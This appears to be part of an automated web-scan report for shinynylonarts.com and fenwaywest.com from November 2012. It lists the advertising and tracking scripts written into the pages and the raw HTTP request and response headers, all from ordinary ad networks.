<script type="text/javascript" src="http://server.adformdsp.net/adfserve/?bn=1329957;rtbpid=3;rtbinv=3;rtbwp=5.107999-zZCw86LB5ZC7lunZ-RHvo7TOhmYLyqZV7cWy01SvO8c1;rtbr=4741703287657975831;rtbcid=paebqcWa9Kg4ukszB6hDMjPkTESS5L7Q0;rtbtpc=cHdjYo81GdgVFcFHG1iKLKbyqSb8bzB30;rtburl=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347;rtbcat=;js=1;adfxid=1x;10195;set=en-US|en-US|1176X885|10|300|250|24|9|3|7|1&CREFURL=http%3a%2f%2fib.adnxs.com%2fif%3fenc%3dl_PMSpduFECX88xKl24UQAAAAAAAAPA_nVPGf38WIUCdU8Z_fxYhQBfQJ3sE6s1BoArzhH1cTlFGOqhQAAAAAHwJDgAYAQAA5wUAAFsAAAD_QjsAqZECAAAAAQBVU0QAVVNEACwB-gDaJQAAzhcAAgUCAQUAAIQAM"></script>

#90 JavaScript::Write (size: 289, repeated: 1)

<script type="text/javascript" src="http://tag.contextweb.com/TagPublish/GetAd.aspx?tagver=1&cp=520266&ct=66900&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=728X90&rq=1&dw=300&cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&cwr=&mrnd=6611261&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US"></script>

#91 JavaScript::Write (size: 291, repeated: 1)

<script type="text/javascript" src="http://tag.contextweb.com/TagPublish/GetAd.aspx?tagver=1&cp=520266&ct=66901&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&cwr=&mrnd=94848874&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US"></script>

#92 JavaScript::Write (size: 291, repeated: 1)

<script type="text/javascript" src="http://tag.contextweb.com/TagPublish/GetAd.aspx?tagver=1&cp=520266&ct=66902&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=160X600&rq=1&dw=300&cwu=http%3A%2F%2Fwww.shinynylonarts.com%2F&cwr=&mrnd=84914336&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US"></script>

#93 JavaScript::Write (size: 888, repeated: 1)

<script type="text/javascript" src=http://uat-net.technoratimedia.com/00/72/26/adserv_2672.js?ad_size=160x600&referrer=http%3A//ad.yieldmanager.com/iframe3%3FbV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAABA3hSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACX2LjcxR7xDA8nR1wRjmwAFZqC.YoMS94jNffjAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252Fbackuptags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html%2CB%253D1%2526Z%253D160x600%2526_salt%253D1916686269%2526anmember%253D514%2526anprice%253D50%2526r%253D0%2526s%253D653070%2C92f3c750-311f-11e2-a7f3-ebbbc404545f%2C1353202245373&nsafe=general&reftype=adnetwork&disp=iframe&tmiv=1&tcb=0.25573602564739906></script>

#94 JavaScript::Write (size: 874, repeated: 1)

<script type="text/javascript" src=http://uat-net.technoratimedia.com/00/72/26/adserv_2672.js?ad_size=728x90&referrer=http%3A//ad.yieldmanager.com/iframe3%3FbV5bEg73CQA77oEAAAAAAPX-IAAAAAAAAgAAAAYAAAAAAP8AAAABA3hSEwAAAAAAm2QrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqhT3OyR7xDJK195hRdfly8dHG-p899Mi2NOC2AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252Fbackuptags%252F520266%252F15c83429-2270-477c-9adf-69374f516793lijit_leader..html%2CZ%253D728x90%2526_salt%253D1015090667%2526anmember%253D514%2526anprice%253D140%2526r%253D0%2526s%253D653070%2C95510210-311f-11e2-ab35-13ecb67a31a5%2C1353202249339&nsafe=general&reftype=adnetwork&disp=iframe&tmiv=1&tcb=0.07352466852552497></script>

#95 JavaScript::Write (size: 2051, repeated: 1)

<script type="text/javascript">
lwp_parent_ad_id=1548;
if(typeof ljt_beacon_vals==="undefined"){ljt_beacon_vals=[];}
ljt_beacon_vals[95028]="bannerid=1548&amp;campaignid=232&amp;cids=232&amp;bids=1548";
if((typeof(LJT_bCInfo)!=="undefined")&&(typeof(LJT_bCInfo[95028])!=="undefined")){ljt_beacon_vals[95028]+=LJT_bCInfo[95028];}  
</script><!-- 728x90 | ROS - Run-of-site -->
<script type="text/javascript">
  rsi_pub = '5EDFA30EEE61C6AE22A15EFEDE1C37E5';
  rsi_site = 'A7798C53EBE3A118D71E950376C2B010';
  rsi_width = '728';
  rsi_height = '90';
</script>
<script type="text/javascript" src="http://ads.revsci.net/adserver/rsiads.js"></script>
<!-- 728x90 | ROS - Run-of-site --><script type="text/javascript">LJT_Ads.servingPassback();</script><script type="text/javascript">var ljt_beacon = "<div id='beacon_1548' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://vap4iad3.lijit.com/www/delivery/lg.php?LJT_REQUEST_INFO&amp;zoneid=95028&amp;tid=95028_1353202247953a384128fa26e&amp;channel_ids=,&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;cb=62daa3d1b0' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>"; ljt_beacon = ljt_beacon.replace("LJT_REQUEST_INFO", ljt_beacon_vals[95028]); document.write(ljt_beacon);</script><script language="JavaScript">function showPremiumAds95028(){var e = document.getElementById("lwp_ad_item_premium_95028"); if (e) { e.style.display="block"; return; }  var i = 0; var w = parent; while (i < 10 && w != null) { var e = w.document.getElementById("lwp_ad_item_premium_95028"); if (e != null ) { e.style.display="block"; i = 10; } ; if (w == self) { i = 10; } else { w = w.parent }; i++; }} showPremiumAds95028(); var lijit_ad_id = "lijit_text_ad_link_txt"; var lijit_text_ad_link = document.getElementById(lijit_ad_id); if (lijit_text_ad_link != null) { lijit_text_ad_link.target = "_blank";} var lijit_text_ad_container = document.getElementById("lijit_text_ad_container"); </script>

#96 JavaScript::Write (size: 2054, repeated: 1)

<script type="text/javascript">
lwp_parent_ad_id=1550;
if(typeof ljt_beacon_vals==="undefined"){ljt_beacon_vals=[];}
ljt_beacon_vals[95032]="bannerid=1550&amp;campaignid=232&amp;cids=232&amp;bids=1550";
if((typeof(LJT_bCInfo)!=="undefined")&&(typeof(LJT_bCInfo[95032])!=="undefined")){ljt_beacon_vals[95032]+=LJT_bCInfo[95032];}  
</script><!-- 160x600 | ROS - Run-of-site -->
<script type="text/javascript">
  rsi_pub = '5EDFA30EEE61C6AE22A15EFEDE1C37E5';
  rsi_site = 'A7798C53EBE3A118D71E950376C2B010';
  rsi_width = '160';
  rsi_height = '600';
</script>
<script type="text/javascript" src="http://ads.revsci.net/adserver/rsiads.js"></script>
<!-- 160x600 | ROS - Run-of-site --><script type="text/javascript">LJT_Ads.servingPassback();</script><script type="text/javascript">var ljt_beacon = "<div id='beacon_1550' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://vap4iad3.lijit.com/www/delivery/lg.php?LJT_REQUEST_INFO&amp;zoneid=95032&amp;tid=95032_13532022430215598551eed27&amp;channel_ids=,&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;cb=25f2bdac13' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>"; ljt_beacon = ljt_beacon.replace("LJT_REQUEST_INFO", ljt_beacon_vals[95032]); document.write(ljt_beacon);</script><script language="JavaScript">function showPremiumAds95032(){var e = document.getElementById("lwp_ad_item_premium_95032"); if (e) { e.style.display="block"; return; }  var i = 0; var w = parent; while (i < 10 && w != null) { var e = w.document.getElementById("lwp_ad_item_premium_95032"); if (e != null ) { e.style.display="block"; i = 10; } ; if (w == self) { i = 10; } else { w = w.parent }; i++; }} showPremiumAds95032(); var lijit_ad_id = "lijit_text_ad_link_txt"; var lijit_text_ad_link = document.getElementById(lijit_ad_id); if (lijit_text_ad_link != null) { lijit_text_ad_link.target = "_blank";} var lijit_text_ad_container = document.getElementById("lijit_text_ad_container"); </script>

#97 JavaScript::Write (size: 1376, repeated: 1)

<script type="text/javascript"> document.writeln('<iframe width="160" scrolling="no" height="600" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAAsXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAACgAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&cost=0.4054&creative_id=378898&zip_code=unknown&referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&exch_id=7&line_item_id=1882693&b=rh56.ovq.wiz.cebq2&source_url=http%3A%2F%2Fwww.yardbarker.com&auction_id=01CE9407-4555-4091-9684-D2171C6AAB19&us_id=5543&invite_uid=&pub_line_item_id=87821&mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&inv_size_id=146840&campaign_id=252144&p_us_id=28812"></iframe>');</script>

#98 JavaScript::Write (size: 1413, repeated: 1)

<script type="text/javascript"> document.writeln('<iframe width="300" scrolling="no" height="250" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAANzU3N0M0REEtMzk5NS00MTUzLTlBMEItN0M5OTI3QkYxMDEzAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&cost=0.4577&creative_id=371685&zip_code=unknown&referrer_url=http%253A%252F%252Fwww.shinynylonarts.com%252F&exch_id=7&line_item_id=1850887&b=rh176.ovq.wiz.cebq2&source_url=http%3A%2F%2Fwww.yardbarker.com&auction_id=560F290B-F280-4C2D-A29D-C38D70226966&us_id=5543&invite_uid=3f62d100-dd98-4006-b187-452598b27a1b&pub_line_item_id=87821&mapped_uid=7-7577C4DA-3995-4153-9A0B-7C9927BF1013&inv_size_id=146842&campaign_id=252144&p_us_id=28812"></iframe>');</script>

#99 JavaScript::Write (size: 124, repeated: 3)

<script type='text/javascript' src='http://ads.pubmatic.com/AdServer/js/cutildee6d705a5077f097c8c64e02d002b24.js' ></script>

#100 JavaScript::Write (size: 82, repeated: 1)

<script type='text/javascript' src='http://edge.quantserve.com/quant.js'></script>

#101 JavaScript::Write (size: 91, repeated: 1)

<script type='text/javascript' src='http://www.yardbarker.com/unica/ntpagetag.js'></script>

#102 JavaScript::Write (size: 42, repeated: 1)

<script type='text/javascript'>_qoptions={

#103 JavaScript::Write (size: 29, repeated: 2)

<script type=text/javascript>

#104 JavaScript::Write (size: 22, repeated: 2)

<span class="PubAdAI">

#105 JavaScript::Write (size: 26, repeated: 1)

<span id="ADFtemp"></span>

#106 JavaScript::Write (size: 38, repeated: 1)

<span id="pubTestSpan_top_0_0"></span>

#107 JavaScript::Write (size: 38, repeated: 1)

<span id="pubTestSpan_top_0_1"></span>

#108 JavaScript::Write (size: 924, repeated: 1)

<style>#lwp_ad_item_premium_95028{	display:none;	position:relative;	width:728px;}#lwp_ad_item_premium_95028>div{}#lwp_adchoices_95028{	display:none;	position:absolute;	right:0px;	top:0px;	z-index:1;	background-color:transparent;	height:16px;	overflow:none;}#lwp_adchoices_95028 img{	border:0px;}</style><div id="lwp_abf_95028"></div><div id="lwp_ad_item_premium_95028"><div><script type='text/javascript' src='http://apr.lijit.com///www/delivery/ajs.php?zoneid=95028&amp;username=bloguin&amp;numAds=1&amp;premium=1&amp;eleid=lijit_region_95028&amp;abf=true&amp;tid=95028_1353202247953a384128fa26e&amp;lijit_kw=&amp;cb=93117615846&amp;flv=10.0.45&amp;time=02:30:47&amp;ifr=1&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;od=fenwaywest.com&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php'></script></div></div><script type='text/javascript'>LJT_Ads.init(); LJT_Ads.fixBeacons(document.body);</script>

#109 JavaScript::Write (size: 924, repeated: 1)

<style>#lwp_ad_item_premium_95032{	display:none;	position:relative;	width:160px;}#lwp_ad_item_premium_95032>div{}#lwp_adchoices_95032{	display:none;	position:absolute;	right:0px;	top:0px;	z-index:1;	background-color:transparent;	height:16px;	overflow:none;}#lwp_adchoices_95032 img{	border:0px;}</style><div id="lwp_abf_95032"></div><div id="lwp_ad_item_premium_95032"><div><script type='text/javascript' src='http://apr.lijit.com///www/delivery/ajs.php?zoneid=95032&amp;username=bloguin&amp;numAds=1&amp;premium=1&amp;eleid=lijit_region_95032&amp;abf=true&amp;tid=95032_13532022430215598551eed27&amp;lijit_kw=&amp;cb=59074969834&amp;flv=10.0.45&amp;time=02:30:43&amp;ifr=1&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;od=fenwaywest.com&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php'></script></div></div><script type='text/javascript'>LJT_Ads.init(); LJT_Ads.fixBeacons(document.body);</script>

#110 JavaScript::Write (size: 65, repeated: 1)

NTPT_PGEXTRA = 'site=9859_fenway_west&account=yardbarkernetwork';

#111 JavaScript::Write (size: 29, repeated: 1)

labels:'FenwayWest.AllSports'

#112 JavaScript::Write (size: 24, repeated: 1)

qacct:'p-a3g2Mplggde4A',

#113 JavaScript::Write (size: 2, repeated: 1)

};


HTTP Transactions (380)


Request Response
GET / HTTP/1.1

Host: www.shinynylonarts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 11 Oct 2012 19:14:57 GMT
Etag: &quot;4d82d89-11a2-63074e40&quot;
Accept-Ranges: bytes
Content-Length: 4514
X-Powered-By: PleskLin
Connection: close
GET /bin/scripts/AC_RunActiveContent.js HTTP/1.1

Host: www.shinynylonarts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.shinynylonarts.com/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Sun, 18 Nov 2012 01:30:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 10 Oct 2012 01:02:39 GMT
Etag: &quot;9a50008-20ab-2d169c0&quot;
Accept-Ranges: bytes
Content-Length: 8363
X-Powered-By: PleskLin
Connection: close
GET /GreyBox_v5_53/greybox/AJS_fx.js HTTP/1.1

Host: www.shinynylonarts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.shinynylonarts.com/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Sun, 18 Nov 2012 01:30:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 10 Oct 2012 01:02:36 GMT
Etag: &quot;4d8280a-da7-2a3a300&quot;
Accept-Ranges: bytes
Content-Length: 3495
X-Powered-By: PleskLin
Connection: close
GET /GreyBox_v5_53/greybox/gb_scripts.js HTTP/1.1

Host: www.shinynylonarts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.shinynylonarts.com/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Sun, 18 Nov 2012 01:30:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 10 Oct 2012 01:02:36 GMT
Etag: &quot;4d8280c-2fb3-2a3a300&quot;
Accept-Ranges: bytes
Content-Length: 12211
X-Powered-By: PleskLin
Connection: close
GET /GreyBox_v5_53/greybox/AJS.js HTTP/1.1

Host: www.shinynylonarts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.shinynylonarts.com/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Sun, 18 Nov 2012 01:30:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 10 Oct 2012 01:02:36 GMT
Etag: &quot;4d82809-29cb-2a3a300&quot;
Accept-Ranges: bytes
Content-Length: 10699
X-Powered-By: PleskLin
Connection: close
GET /GreyBox_v5_53/greybox/gb_styles.css HTTP/1.1

Host: www.shinynylonarts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.shinynylonarts.com/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 17 Feb 2009 22:07:57 GMT
Etag: &quot;4d8280d-9e7-891a0940&quot;
Accept-Ranges: bytes
Content-Length: 2535
X-Powered-By: PleskLin
Connection: close
GET /favicon.ico HTTP/1.1

Host: www.shinynylonarts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/plain
Date: Sun, 18 Nov 2012 01:30:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 19 Jan 2009 14:01:49 GMT
Etag: &quot;4d82d86-4486-5d27cd40&quot;
Accept-Ranges: bytes
Content-Length: 17542
X-Powered-By: PleskLin
Connection: close
GET /media/index.php HTTP/1.1

Host: fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.shinynylonarts.com/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:33 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot;
Etag: 95cda459a21698ac0d2eaaa4602c106c
Content-Encoding: gzip
X-Content-Encoded-By: Joomla! 2.5
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: e10b4ecd1c1cb1f76b4bf3d66b789f6e=3f5b5b16482f13ac94917f93254197d2; path=/
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /profile_images/1313133785/fenwestlogo_normal.png HTTP/1.1

Host: a0.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Date: Sun, 18 Nov 2012 01:30:34 GMT
Etag: &quot;37b03cd1dbc33c3e88030535bd0fbcc4&quot;
Expires: Mon, 18 Nov 2013 01:30:34 GMT
Last-Modified: Sat, 16 Apr 2011 03:19:54 GMT
Server: ECS (arn/46DE)
x-amz-id-2: 4VU85t/LqfN1TINUMzbeW/pRr7VIk3oNQRuKPboHw/ptF9yRV1mqTl1xZuebk9jO
x-amz-request-id: 0F220021AA0BC119
X-Cache: HIT
Content-Length: 4646
GET /plugins/editors/jckeditor/typography/typography.php HTTP/1.1

Host: fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: e10b4ecd1c1cb1f76b4bf3d66b789f6e=3f5b5b16482f13ac94917f93254197d2
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
Cache-Control: public
Expires: Mon, 19 Nov 2012 01:30:34 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /media/system/js/core.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 13 Sep 2012 12:09:02 GMT
Etag: &quot;ecd35c-12b0-4c9942c467380&quot;
Accept-Ranges: bytes
Content-Length: 4784
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /media/system/js/caption.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 15 Jun 2012 14:01:48 GMT
Etag: &quot;ecd365-291-4c28341d7ab00&quot;
Accept-Ranges: bytes
Content-Length: 657
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /cache/widgetkit/widgetkit-fac83f8d.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 15 Nov 2012 17:26:35 GMT
Etag: &quot;f613d4-4c8c-4ce8bf3ecc8c0&quot;
Accept-Ranges: bytes
Content-Length: 19596
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /network/ybn_pixel/9859 HTTP/1.1

Host: network.yardbarker.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

